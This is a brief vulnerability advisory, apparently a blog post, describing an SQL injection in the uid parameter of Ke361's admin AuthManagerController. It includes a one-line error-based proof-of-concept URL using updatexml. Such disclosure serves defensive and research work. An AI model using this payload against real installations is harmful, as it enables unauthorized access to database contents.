Ke361 Authmanagercontroller Class Php Background Sql Injection Vulnerability
Ke361 Authmanagercontroller Class Php Background Sql Injection Vulnerability
Ke361 AuthManagerController.class.php Background SQL injection vulnerability
Vulnerability Description
Ke361 AuthManagerController.class.php uid parameter has SQL injection vulnerability, through which database sensitive information can be obtained
Vulnerability Impact
Ke361
Environment construction
https://gitee.com/jcove/ke361
Vulnerability reappears
CMS Product Page
The vulnerable file is Application/Admin/Controller/AuthManagerController.class.php
Verify POC
1
/admin.php?s=/AuthManager/group/uid/1')%20AND%20updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--+
This post is licensed under CC BY 4.0 by the author.